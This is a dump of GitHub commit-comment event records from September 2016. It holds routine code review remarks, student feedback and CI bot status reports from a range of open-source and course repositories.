{"id":"4537094866","type":"CommitCommentEvent","actor":{"login":"abhikeshav"},"repo":{"name":"manradhaCisco/ydk-gen"},"payload":{"comment":{"id":18954402,"position":5,"line":148,"path":"ydkgen/__init__.py","commit_id":"958f7cdd41d32595d390fa64acfaa2eb6501386c","created_at":"2016-09-08T22:40:03Z","updated_at":"2016-09-08T22:40:03Z","body":"No need to check for this option.. self.language == 'cpp' should be enough"}},"created_at":"2016-09-08T22:40:03Z"}
{"id":"4537096153","type":"CommitCommentEvent","actor":{"login":"abhikeshav"},"repo":{"name":"manradhaCisco/ydk-gen"},"payload":{"comment":{"id":18954405,"position":11,"line":154,"path":"ydkgen/__init__.py","commit_id":"958f7cdd41d32595d390fa64acfaa2eb6501386c","created_at":"2016-09-08T22:40:22Z","updated_at":"2016-09-08T22:40:22Z","body":"libyang needs to be cloned from the ydk_core branch"}},"created_at":"2016-09-08T22:40:22Z"}
{"id":"4537097049","type":"CommitCommentEvent","actor":{"login":"TrySound"},"repo":{"name":"TrySound/rollup-plugin-eslint"},"payload":{"comment":{"id":18954406,"position":4,"line":0,"path":"rollup.config.js","commit_id":"b46eba4299f4c75c3dd688899d0ed2e9e1a50258","created_at":"2016-09-08T22:40:36Z","updated_at":"2016-09-08T22:40:36Z","body":"It's json. Rollup config can't import json. So we use node way."}},"created_at":"2016-09-08T22:40:36Z"}
{"id":"4537098425","type":"CommitCommentEvent","actor":{"login":"abhikeshav"},"repo":{"name":"manradhaCisco/ydk-gen"},"payload":{"comment":{"id":18954409,"position":14,"line":157,"path":"ydkgen/__init__.py","commit_id":"958f7cdd41d32595d390fa64acfaa2eb6501386c","created_at":"2016-09-08T22:40:58Z","updated_at":"2016-09-08T22:40:58Z","body":"Can make these into a temporary directory called .libs and add a .gitignore there"}},"created_at":"2016-09-08T22:40:58Z"}
{"id":"4537101675","type":"CommitCommentEvent","actor":{"login":"kdavis-mozilla"},"repo":{"name":"lissyx/DeepSpeech"},"payload":{"comment":{"id":18954421,"position":204,"line":204,"path":"deepspeech.py","commit_id":"c0ab660b38129a7bb10f85b7d730b0605d90c94a","created_at":"2016-09-08T22:41:51Z","updated_at":"2016-09-08T22:41:51Z","body":"Don't spend too much time making this pretty, Andre will re-write this for the TED, Fischer, and Switchboard data sets."}},"created_at":"2016-09-08T22:41:51Z"}
{"id":"4537102362","type":"CommitCommentEvent","actor":{"login":"abhikeshav"},"repo":{"name":"manradhaCisco/ydk-gen"},"payload":{"comment":{"id":18954423,"position":19,"line":162,"path":"ydkgen/__init__.py","commit_id":"958f7cdd41d32595d390fa64acfaa2eb6501386c","created_at":"2016-09-08T22:42:04Z","updated_at":"2016-09-08T22:42:04Z","body":"Can use python library functions to create directory (also check if alrady exists and delete it)"}},"created_at":"2016-09-08T22:42:04Z"}
{"id":"4537103033","type":"CommitCommentEvent","actor":{"login":"markgrossnickle"},"repo":{"name":"Microsoft/HoloToolkit-Unity"},"payload":{"comment":{"id":18954424,"position":null,"line":null,"path":null,"commit_id":"4d8fd9213fee9934e5b439f81c340b418ff0da72","created_at":"2016-09-08T22:42:15Z","updated_at":"2016-09-08T22:42:15Z","body":"The old way used to only affect the x/y axes.  Setting Free meant setting both X and Y.  The new code now sets the z as well when you set free.  \r\n\r\nThere should be an option for just X and Y (example: Tag-a-longs). "}},"created_at":"2016-09-08T22:42:15Z"}
{"id":"4537104479","type":"CommitCommentEvent","actor":{"login":"abhikeshav"},"repo":{"name":"manradhaCisco/ydk-gen"},"payload":{"comment":{"id":18954426,"position":28,"line":171,"path":"ydkgen/__init__.py","commit_id":"958f7cdd41d32595d390fa64acfaa2eb6501386c","created_at":"2016-09-08T22:42:38Z","updated_at":"2016-09-08T22:42:38Z","body":"Suggest splitting this code into smaller functions to follow clean code"}},"created_at":"2016-09-08T22:42:38Z"}
{"id":"4537108136","type":"CommitCommentEvent","actor":{"login":"mogest"},"repo":{"name":"mojavelinux/prawn-svg"},"payload":{"comment":{"id":18954439,"position":9,"line":58,"path":"lib/prawn/svg/font.rb","commit_id":"75e3598cd1f6473beef4ee74408b752abdc430af","created_at":"2016-09-08T22:43:34Z","updated_at":"2016-09-08T22:43:34Z","body":"Hmm, does this need to be `[weight, style].compact.map(&:to_s).join('_').to_sym` for the same reason?"}},"created_at":"2016-09-08T22:43:34Z"}
{"id":"4537111717","type":"CommitCommentEvent","actor":{"login":"kdavis-mozilla"},"repo":{"name":"lissyx/DeepSpeech"},"payload":{"comment":{"id":18954448,"position":220,"line":220,"path":"deepspeech.py","commit_id":"c0ab660b38129a7bb10f85b7d730b0605d90c94a","created_at":"2016-09-08T22:44:29Z","updated_at":"2016-09-08T22:44:29Z","body":"FYI with various samples not all will have the same n_steps. So this in general this will not work."}},"created_at":"2016-09-08T22:44:29Z"}
{"id":"4537112948","type":"CommitCommentEvent","actor":{"login":"m-stachyra"},"repo":{"name":"visualitypl/textris"},"payload":{"comment":{"id":18954453,"position":null,"line":null,"path":null,"commit_id":"0fdf22704e6b470fcff0efd5a8796aaf886a065a","created_at":"2016-09-08T22:44:48Z","updated_at":"2016-09-08T22:44:48Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;hmvr9HjW&#x2F;13-test-trello-s-github-powerup\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Test Trello&#39;s GitHub PowerUp!</a>"}},"created_at":"2016-09-08T22:44:48Z"}
{"id":"4537115018","type":"CommitCommentEvent","actor":{"login":"snuggs"},"repo":{"name":"TrySound/rollup-plugin-eslint"},"payload":{"comment":{"id":18954455,"position":4,"line":3,"path":"rollup.config.js","commit_id":"b46eba4299f4c75c3dd688899d0ed2e9e1a50258","created_at":"2016-09-08T22:45:23Z","updated_at":"2016-09-08T22:45:23Z","body":"Yeah just got hit in the face!\r\n![capture d ecran 2016-09-08 a 18 45 52](https://cloud.githubusercontent.com/assets/38223/18369555/65555318-75f4-11e6-8bb7-36245eb06c3d.png)\r\n"}},"created_at":"2016-09-08T22:45:23Z"}
{"id":"4537117467","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"secretagentan/homework-city"},"payload":{"comment":{"id":18954466,"position":2,"line":2,"path":"js/index.js","commit_id":"c80cfc65c15ce529e2048e3e0821c9bdbbe9fa22","created_at":"2016-09-08T22:46:01Z","updated_at":"2016-09-08T22:46:01Z","body":"Great work with this!"}},"created_at":"2016-09-08T22:46:01Z"}
{"id":"4537120856","type":"CommitCommentEvent","actor":{"login":"koying"},"repo":{"name":"koying/SPMC"},"payload":{"comment":{"id":18954475,"position":null,"line":null,"path":null,"commit_id":"861b8011dee37619b51dd1be9309a3870fd90f0b","created_at":"2016-09-08T22:46:55Z","updated_at":"2016-09-08T22:46:55Z","body":"Yeah, well, still not loading :("}},"created_at":"2016-09-08T22:46:55Z"}
{"id":"4537121187","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18954476,"position":null,"line":null,"path":null,"commit_id":"2794bee88aee15713b7bde1041f842824e80ec31","created_at":"2016-09-08T22:46:59Z","updated_at":"2016-09-08T22:46:59Z","body":"@JoinRajuncraftNow"}},"created_at":"2016-09-08T22:46:59Z"}
{"id":"4537121415","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"secretagentan/homework-city"},"payload":{"comment":{"id":18954477,"position":22,"line":22,"path":"js/index.js","commit_id":"c80cfc65c15ce529e2048e3e0821c9bdbbe9fa22","created_at":"2016-09-08T22:47:03Z","updated_at":"2016-09-08T22:47:03Z","body":"You don't actually need to include this here b/c you included it above"}},"created_at":"2016-09-08T22:47:03Z"}
{"id":"4537121846","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"secretagentan/homework-city"},"payload":{"comment":{"id":18954479,"position":14,"line":14,"path":"js/index.js","commit_id":"c80cfc65c15ce529e2048e3e0821c9bdbbe9fa22","created_at":"2016-09-08T22:47:10Z","updated_at":"2016-09-08T22:47:10Z","body":"Great stuff!  👍 "}},"created_at":"2016-09-08T22:47:10Z"}
{"id":"4537121929","type":"CommitCommentEvent","actor":{"login":"sgivens0"},"repo":{"name":"mkleehammer/pyodbc"},"payload":{"comment":{"id":18954480,"position":null,"line":null,"path":null,"commit_id":"bc1eec863c5ab2ac6826f72be255661e01bac41e","created_at":"2016-09-08T22:47:12Z","updated_at":"2016-09-08T22:47:12Z","body":"Hello @mkleehammer  this doesn't work if mac homebrew is in a nonstandard prefix, see https://github.com/mkleehammer/pyodbc/issues/101#issuecomment-243900415\r\n\r\nis there any way to upstream a way to resolve this or add some sort of flag, or what do you recommend? I'm happy to open a new ticket about this"}},"created_at":"2016-09-08T22:47:12Z"}
{"id":"4537122500","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"secretagentan/homework-city"},"payload":{"comment":{"id":18954483,"position":16,"line":16,"path":"js/index.js","commit_id":"c80cfc65c15ce529e2048e3e0821c9bdbbe9fa22","created_at":"2016-09-08T22:47:20Z","updated_at":"2016-09-08T22:47:20Z","body":"Nice work clearing it 👍 "}},"created_at":"2016-09-08T22:47:20Z"}
{"id":"4537123222","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"secretagentan/homework-city"},"payload":{"comment":{"id":18954485,"position":18,"line":18,"path":"js/index.js","commit_id":"c80cfc65c15ce529e2048e3e0821c9bdbbe9fa22","created_at":"2016-09-08T22:47:32Z","updated_at":"2016-09-08T22:47:32Z","body":"great job passing that value to another function 💯 "}},"created_at":"2016-09-08T22:47:32Z"}
{"id":"4537123898","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"secretagentan/homework-city"},"payload":{"comment":{"id":18954489,"position":26,"line":26,"path":"js/index.js","commit_id":"c80cfc65c15ce529e2048e3e0821c9bdbbe9fa22","created_at":"2016-09-08T22:47:42Z","updated_at":"2016-09-08T22:47:42Z","body":"Great work using the attr()!"}},"created_at":"2016-09-08T22:47:42Z"}
{"id":"4537129861","type":"CommitCommentEvent","actor":{"login":"gortonz"},"repo":{"name":"AusDTO/dto-dashboard"},"payload":{"comment":{"id":18954503,"position":null,"line":null,"path":null,"commit_id":"a70933822106ab5dcc36d88e6fffaac971a92f8c","created_at":"2016-09-08T22:49:16Z","updated_at":"2016-09-08T22:49:16Z","body":"We moved the Ruby codes from .rb files to .erb files. In the view of server side scripting, the Ruby language interpretation (rb files) should be done more efficiently than those template engine processes such as embedded ruby with HTML/css/js, shouldn't it? Is this Rails' recommend implementation?"}},"created_at":"2016-09-08T22:49:16Z"}
{"id":"4537130254","type":"CommitCommentEvent","actor":{"login":"n0skill"},"repo":{"name":"n0skill/sPyglass"},"payload":{"comment":{"id":18954506,"position":null,"line":null,"path":null,"commit_id":"09a5046f14e2fb23035f229c33e229ff06709d93","created_at":"2016-09-08T22:49:23Z","updated_at":"2016-09-08T22:49:23Z","body":"Fixes #1 "}},"created_at":"2016-09-08T22:49:23Z"}
{"id":"4537133059","type":"CommitCommentEvent","actor":{"login":"gogoengie"},"repo":{"name":"gogoengie/bcolz"},"payload":{"comment":{"id":18954513,"position":null,"line":null,"path":null,"commit_id":"f4bcbb8b7a724693c7f9911486a361b7311ab620","created_at":"2016-09-08T22:50:05Z","updated_at":"2016-09-08T22:50:05Z","body":"Coffee-break patch for https://github.com/Blosc/bcolz/issues/317\r\n\r\nMinimal testing, so here be dragons."}},"created_at":"2016-09-08T22:50:05Z"}
{"id":"4537135272","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"secretagentan/homework-city"},"payload":{"comment":{"id":18954519,"position":35,"line":35,"path":"js/index.js","commit_id":"c80cfc65c15ce529e2048e3e0821c9bdbbe9fa22","created_at":"2016-09-08T22:50:39Z","updated_at":"2016-09-08T22:50:39Z","body":"I totally understand your logic here with using .removeClass().  We actually would only need to use that if you were using addClass() to add the classes one-by-one.  Using .attr(\"class\", \"class-name\") will actually set the value of the class attribute, rather than adding to it.  Therefore, each time you use it, it you will overwrite the current class name. "}},"created_at":"2016-09-08T22:50:39Z"}
{"id":"4537135439","type":"CommitCommentEvent","actor":{"login":"schonmann"},"repo":{"name":"schonmann/EDL"},"payload":{"comment":{"id":18954520,"position":null,"line":null,"path":null,"commit_id":"588cab99cb340970e528b4c373457eda48893c05","created_at":"2016-09-08T22:50:41Z","updated_at":"2016-09-08T22:50:41Z","body":"Prof, acho que sei o que aconteceu. Você pode ter tentado rodar do 'trabalho-02', na confusão da troca pra 'trabalho-03' commitei algo que quebrou o '02'."}},"created_at":"2016-09-08T22:50:41Z"}
{"id":"4537139548","type":"CommitCommentEvent","actor":{"login":"b1conrad"},"repo":{"name":"Picolab/node-pico-engine"},"payload":{"comment":{"id":18954530,"position":null,"line":null,"path":null,"commit_id":"d63e24e426ed6b836b3e4c61f016bc195f62716c","created_at":"2016-09-08T22:51:46Z","updated_at":"2016-09-08T22:51:46Z","body":"1. emphasize the name by italicizing\r\n2. allow to specify name when adding the child (thanks to @burdettadam for this suggestion) with the actual retention of the name done by KRL code\r\n3. normalize the order of things for channels"}},"created_at":"2016-09-08T22:51:46Z"}
{"id":"4537140086","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"secretagentan/homework-city"},"payload":{"comment":{"id":18954532,"position":130,"line":130,"path":"css/style.css","commit_id":"c80cfc65c15ce529e2048e3e0821c9bdbbe9fa22","created_at":"2016-09-08T22:51:56Z","updated_at":"2016-09-08T22:51:56Z","body":"Looks like a typo with \"R\""}},"created_at":"2016-09-08T22:51:56Z"}
{"id":"4537147992","type":"CommitCommentEvent","actor":{"login":"ninaholic"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":18954569,"position":null,"line":null,"path":null,"commit_id":"113c206fa5f5f7352a404feb7d151bbbeef0abe9","created_at":"2016-09-08T22:54:03Z","updated_at":"2016-09-08T22:54:03Z","body":"Hi 01micko,\r\n\r\nI notice in https://github.com/puppylinux-woof-CE/woof-CE/commit/671db05f89d599095f8845c771d4139f95bd6f91 (Slacko 6.9.6) that you switch to util-linux-2.27, but in this commit you switch back to util-linux-2.21 (I think?). Was this an accident or because you found a problem with 2.27? If the latter, do you think maybe 2.23 or 2.24 will work? :smile: "}},"created_at":"2016-09-08T22:54:03Z"}
{"id":"4537153708","type":"CommitCommentEvent","actor":{"login":"ceciliacorral"},"repo":{"name":"CareMessagePlatform/caremessage-site"},"payload":{"comment":{"id":18954599,"position":null,"line":null,"path":null,"commit_id":"edbafc6a4809c14a8609d6d4e6b4170a6c8e7dee","created_at":"2016-09-08T22:55:29Z","updated_at":"2016-09-08T22:55:29Z","body":"@danielnc did this get pushed? Website is still showing the old list of programs"}},"created_at":"2016-09-08T22:55:29Z"}
{"id":"4537153740","type":"CommitCommentEvent","actor":{"login":"tobyhede"},"repo":{"name":"AusDTO/dto-dashboard"},"payload":{"comment":{"id":18954600,"position":null,"line":null,"path":null,"commit_id":"a70933822106ab5dcc36d88e6fffaac971a92f8c","created_at":"2016-09-08T22:55:30Z","updated_at":"2016-09-08T22:55:30Z","body":"The variables were set in the controller, but the template system still needs to interpret those variables into the code, no matter where they are set. `content_for` is a method, so would arguably take more clock cycles than a variable interpolation. But we're talking at a very micro level. \r\n\r\nThe preference is always on code readability and maintainability than micro-optimisations for performance issues. The biggest performance improvements we could make at the moment are just to cache the widget partials. \r\n\r\n"}},"created_at":"2016-09-08T22:55:30Z"}
{"id":"4537155208","type":"CommitCommentEvent","actor":{"login":"cydh"},"repo":{"name":"rathena/rathena"},"payload":{"comment":{"id":18954609,"position":null,"line":null,"path":null,"commit_id":"7d0c7d8b242f6a9eff98584b7fdea5209109166c","created_at":"2016-09-08T22:55:52Z","updated_at":"2016-09-08T22:55:52Z","body":"those `::OnChat` hmm"}},"created_at":"2016-09-08T22:55:52Z"}
{"id":"4537159153","type":"CommitCommentEvent","actor":{"login":"emilylan"},"repo":{"name":"IncrediblyHumble/2340"},"payload":{"comment":{"id":18954630,"position":null,"line":null,"path":null,"commit_id":"726fe242c392463fe4bcc495c5df7d0d29d47d75","created_at":"2016-09-08T22:56:53Z","updated_at":"2016-09-08T22:56:53Z","body":"Name/email- emily\r\n"}},"created_at":"2016-09-08T22:56:53Z"}
{"id":"4537162813","type":"CommitCommentEvent","actor":{"login":"ventasjt92"},"repo":{"name":"ventasjt92/Web"},"payload":{"comment":{"id":18954653,"position":null,"line":null,"path":null,"commit_id":"8ffae586aa35373f1262d7882ab35720f034a0ba","created_at":"2016-09-08T22:57:50Z","updated_at":"2016-09-08T22:57:50Z","body":"muy bien quedo perfecto"}},"created_at":"2016-09-08T22:57:50Z"}
{"id":"4537163675","type":"CommitCommentEvent","actor":{"login":"Pouramua"},"repo":{"name":"Pouramua/pouramua.github.io"},"payload":{"comment":{"id":18954661,"position":null,"line":null,"path":null,"commit_id":"248f82a4614ed212c5bc0a9d4cf9f3914639704b","created_at":"2016-09-08T22:58:04Z","updated_at":"2016-09-08T22:58:04Z","body":"Image size"}},"created_at":"2016-09-08T22:58:04Z"}
{"id":"4537163735","type":"CommitCommentEvent","actor":{"login":"felipevicens"},"repo":{"name":"sonata-nfv/son-gkeeper"},"payload":{"comment":{"id":18954662,"position":8,"line":37,"path":"son-gtksrv/models/mq_server.rb","commit_id":"206486cf264ef8ab65af3702bd3d465b38a15eb3","created_at":"2016-09-08T22:58:05Z","updated_at":"2016-09-08T22:58:05Z","body":"@jbonnet should be service.instances.create not service.instances.instances like https://github.com/sonata-nfv/son-mano-framework/blob/master/plugins/son-mano-service-lifecycle-management/son_mano_slm/slm.py#L51"}},"created_at":"2016-09-08T22:58:05Z"}
{"id":"4537165499","type":"CommitCommentEvent","actor":{"login":"kdavis-mozilla"},"repo":{"name":"lissyx/DeepSpeech"},"payload":{"comment":{"id":18954672,"position":245,"line":245,"path":"deepspeech.py","commit_id":"c0ab660b38129a7bb10f85b7d730b0605d90c94a","created_at":"2016-09-08T22:58:31Z","updated_at":"2016-09-08T22:58:31Z","body":"This is tied to the creation of targets. For now it doesn't matter that this is defined twice, but we need to consolidate the definitions."}},"created_at":"2016-09-08T22:58:31Z"}
{"id":"4537165703","type":"CommitCommentEvent","actor":{"login":"adhg"},"repo":{"name":"adhg/pyDev1"},"payload":{"comment":{"id":18954674,"position":55,"line":56,"path":"amit3/run_analysis.py","commit_id":"fd72540d318699d82de8dd0254f8abbd860b06d0","created_at":"2016-09-08T22:58:35Z","updated_at":"2016-09-08T22:58:35Z","body":"explain this to my pals :+1: "}},"created_at":"2016-09-08T22:58:35Z"}
{"id":"4537166006","type":"CommitCommentEvent","actor":{"login":"koying"},"repo":{"name":"koying/SPMC"},"payload":{"comment":{"id":18954676,"position":null,"line":null,"path":null,"commit_id":"861b8011dee37619b51dd1be9309a3870fd90f0b","created_at":"2016-09-08T22:58:40Z","updated_at":"2016-09-08T22:58:40Z","body":"Well addons aren't. Surely some dependency issue... "}},"created_at":"2016-09-08T22:58:40Z"}
{"id":"4537169550","type":"CommitCommentEvent","actor":{"login":"kdavis-mozilla"},"repo":{"name":"lissyx/DeepSpeech"},"payload":{"comment":{"id":18954691,"position":267,"line":267,"path":"deepspeech.py","commit_id":"c0ab660b38129a7bb10f85b7d730b0605d90c94a","created_at":"2016-09-08T22:59:38Z","updated_at":"2016-09-08T22:59:38Z","body":"For now we can forget `istate_fw`and `istate_bw` If we find later we need them to tweak the initial state, we can add them."}},"created_at":"2016-09-08T22:59:38Z"}
{"id":"4537172557","type":"CommitCommentEvent","actor":{"login":"ilyubin"},"repo":{"name":"mdvd4/java_pft"},"payload":{"comment":{"id":18954712,"position":42,"line":81,"path":"addressbook-web-tests/src/test/java/lavr/stqa/pft/addressbook/appmanager/ContactHelper.java","commit_id":"b317614ee32c9a9d3c72ec62dc72da4f8e310393","created_at":"2016-09-08T23:00:24Z","updated_at":"2016-09-08T23:00:24Z","body":"public void createContact(ContactData contact)  - здесь второй параметр не нужен"}},"created_at":"2016-09-08T23:00:24Z"}
{"id":"4537173857","type":"CommitCommentEvent","actor":{"login":"ilyubin"},"repo":{"name":"mdvd4/java_pft"},"payload":{"comment":{"id":18954718,"position":44,"line":83,"path":"addressbook-web-tests/src/test/java/lavr/stqa/pft/addressbook/appmanager/ContactHelper.java","commit_id":"b317614ee32c9a9d3c72ec62dc72da4f8e310393","created_at":"2016-09-08T23:00:43Z","updated_at":"2016-09-08T23:00:43Z","body":"fillContactForm(contact, true) - здесь надо вызвать так"}},"created_at":"2016-09-08T23:00:43Z"}
{"id":"4537175220","type":"CommitCommentEvent","actor":{"login":"kdavis-mozilla"},"repo":{"name":"lissyx/DeepSpeech"},"payload":{"comment":{"id":18954725,"position":342,"line":342,"path":"deepspeech.py","commit_id":"c0ab660b38129a7bb10f85b7d730b0605d90c94a","created_at":"2016-09-08T23:01:05Z","updated_at":"2016-09-08T23:01:05Z","body":"See the placeholder `y`"}},"created_at":"2016-09-08T23:01:05Z"}
{"id":"4537179736","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18954768,"position":null,"line":null,"path":null,"commit_id":"de88f6a99d8546ace57ef63e9538e656fcf84ab2","created_at":"2016-09-08T23:02:16Z","updated_at":"2016-09-08T23:02:16Z","body":"develop (Unknown) - x86_64-Linux-Ubuntu-14.04-clang-3.5: OK (2354 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-de88f6a99d8546ace57ef63e9538e656fcf84ab2-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-de88f6a99d8546ace57ef63e9538e656fcf84ab2-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-96.16%25-yellow.svg)</a> \n"}},"created_at":"2016-09-08T23:02:16Z"}
{"id":"4537179923","type":"CommitCommentEvent","actor":{"login":"martingkelly"},"repo":{"name":"martingkelly/bbdocs"},"payload":{"comment":{"id":18954769,"position":4,"line":211,"path":"docs/0.8.14/manual/cfg-schedulers.html","commit_id":"d9e6b2d259bbd66876475a91f9e98739e329673d","created_at":"2016-09-08T23:02:19Z","updated_at":"2016-09-08T23:02:19Z","body":"Yes, this was... difficult... to write :). And the output was not too pretty in the end!"}},"created_at":"2016-09-08T23:02:19Z"}
{"id":"4537180682","type":"CommitCommentEvent","actor":{"login":"gomker"},"repo":{"name":"gomker/HullBreach"},"payload":{"comment":{"id":18954772,"position":null,"line":null,"path":null,"commit_id":"799b7ca5e1815f82c4882e8d15c05f6f1226efb8","created_at":"2016-09-08T23:02:31Z","updated_at":"2016-09-08T23:02:31Z","body":"Note - should not copy paste the edit from folder, looks like I just replaced everything"}},"created_at":"2016-09-08T23:02:31Z"}
{"id":"4537183363","type":"CommitCommentEvent","actor":{"login":"mclarekin"},"repo":{"name":"buddhi1980/mandelbulber2"},"payload":{"comment":{"id":18954782,"position":null,"line":null,"path":null,"commit_id":"64ac56b4d1a52882e89bd1f879238d456fa5c0b2","created_at":"2016-09-08T23:03:12Z","updated_at":"2016-09-08T23:03:12Z","body":"well done!!"}},"created_at":"2016-09-08T23:03:12Z"}
{"id":"4537184819","type":"CommitCommentEvent","actor":{"login":"Uppermost"},"repo":{"name":"OpenNos/OpenNos"},"payload":{"comment":{"id":18954786,"position":null,"line":null,"path":null,"commit_id":"18787491d7fc18707c278879f1ac2ae733eff8e2","created_at":"2016-09-08T23:03:32Z","updated_at":"2016-09-08T23:03:32Z","body":" OpenNos.Handler/BattlePacketHandler.cs seems to have some problem after update need to revert or modify it"}},"created_at":"2016-09-08T23:03:32Z"}
{"id":"4537185868","type":"CommitCommentEvent","actor":{"login":"ruslan-java"},"repo":{"name":"ruslan-java/site"},"payload":{"comment":{"id":18954787,"position":7,"line":5,"path":"b.txt","commit_id":"1f5dc87e53d313bb9efd3a1ff4e62c58190f2515","created_at":"2016-09-08T23:03:49Z","updated_at":"2016-09-08T23:03:49Z","body":"cvbdfb"}},"created_at":"2016-09-08T23:03:49Z"}
{"id":"4537191888","type":"CommitCommentEvent","actor":{"login":"nickbradley"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":18954804,"position":null,"line":null,"path":null,"commit_id":"278ecf9588435f21a707698d6affa72c1d402206","created_at":"2016-09-08T23:05:29Z","updated_at":"2016-09-08T23:05:29Z","body":"@CPSC310Bot "}},"created_at":"2016-09-08T23:05:29Z"}
{"id":"4537191956","type":"CommitCommentEvent","actor":{"login":"CPSC310Bot"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":18954805,"position":null,"line":null,"path":null,"commit_id":"278ecf9588435f21a707698d6affa72c1d402206","created_at":"2016-09-08T23:05:30Z","updated_at":"2016-09-08T23:05:30Z","body":"Request received; should be processed within 2 minutes.\nNote: No deliverable specified, using latest."}},"created_at":"2016-09-08T23:05:30Z"}
{"id":"4537192171","type":"CommitCommentEvent","actor":{"login":"CPSC310Bot"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":18954807,"position":null,"line":null,"path":null,"commit_id":"278ecf9588435f21a707698d6affa72c1d402206","created_at":"2016-09-08T23:05:33Z","updated_at":"2016-09-08T23:05:33Z","body":"Invalid Mocha output."}},"created_at":"2016-09-08T23:05:33Z"}
{"id":"4537195931","type":"CommitCommentEvent","actor":{"login":"PWKad"},"repo":{"name":"aurelia/dialog"},"payload":{"comment":{"id":18954826,"position":22,"line":91,"path":"test/unit/dialog-service.spec.js","commit_id":"79e39a76067f949a49b30e68bce6aa2570812d4a","created_at":"2016-09-08T23:06:37Z","updated_at":"2016-09-08T23:06:37Z","body":"Updated in subsequent commit"}},"created_at":"2016-09-08T23:06:37Z"}
{"id":"4537197206","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.app.drafts"},"payload":{"comment":{"id":18954829,"position":null,"line":null,"path":null,"commit_id":"31188b6d7066946b0e136c5a89149b51d4cdfa61","created_at":"2016-09-08T23:06:59Z","updated_at":"2016-09-08T23:06:59Z","body":"@datakurre Jenkins CI reporting about code analysis\nSee the full report here: http://jenkins.plone.org/job/package-plone.app.drafts/21/violations\n```\nplone/app/drafts/__init__.py:0:1: I001 isort found changes, run it on the file\nplone/app/drafts/tests.py:1135:15: S001 found % formatter\nplone/app/drafts/tests.py:1175:15: S001 found % formatter\nplone/app/drafts/tests.py:1222:13: P101 format string does contain unindexed parameters\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2016-09-08T23:06:59Z"}
{"id":"4537200449","type":"CommitCommentEvent","actor":{"login":"IAmNotHanni"},"repo":{"name":"inexor-game/code"},"payload":{"comment":{"id":18954846,"position":36,"line":36,"path":"inexor/flowgraph/events/areas/player_enter_area/fl_event_player_enter_area.cpp","commit_id":"86beb419f268e28a679d94d9d7dfe0b81e77e801","created_at":"2016-09-08T23:07:53Z","updated_at":"2016-09-08T23:07:53Z","body":"Again this should do it.."}},"created_at":"2016-09-08T23:07:53Z"}
{"id":"4537200762","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18954848,"position":null,"line":null,"path":null,"commit_id":"de88f6a99d8546ace57ef63e9538e656fcf84ab2","created_at":"2016-09-08T23:07:58Z","updated_at":"2016-09-08T23:07:58Z","body":"develop (Unknown) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-de88f6a99d8546ace57ef63e9538e656fcf84ab2-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a>  \n"}},"created_at":"2016-09-08T23:07:58Z"}
{"id":"4537208082","type":"CommitCommentEvent","actor":{"login":"danielnc"},"repo":{"name":"CareMessagePlatform/caremessage-site"},"payload":{"comment":{"id":18954862,"position":null,"line":null,"path":null,"commit_id":"edbafc6a4809c14a8609d6d4e6b4170a6c8e7dee","created_at":"2016-09-08T23:10:02Z","updated_at":"2016-09-08T23:10:02Z","body":"@ceciliacorral it failed and I didn't noticed\r\n\r\nPushed again"}},"created_at":"2016-09-08T23:10:02Z"}
{"id":"4537217737","type":"CommitCommentEvent","actor":{"login":"nickbradley"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":18954898,"position":null,"line":null,"path":null,"commit_id":"278ecf9588435f21a707698d6affa72c1d402206","created_at":"2016-09-08T23:12:50Z","updated_at":"2016-09-08T23:12:50Z","body":"@CPSC310Bot "}},"created_at":"2016-09-08T23:12:50Z"}
{"id":"4537217766","type":"CommitCommentEvent","actor":{"login":"CPSC310Bot"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":18954899,"position":null,"line":null,"path":null,"commit_id":"278ecf9588435f21a707698d6affa72c1d402206","created_at":"2016-09-08T23:12:51Z","updated_at":"2016-09-08T23:12:51Z","body":"Request received; should be processed within 2 minutes.\nNote: No deliverable specified, using latest."}},"created_at":"2016-09-08T23:12:51Z"}
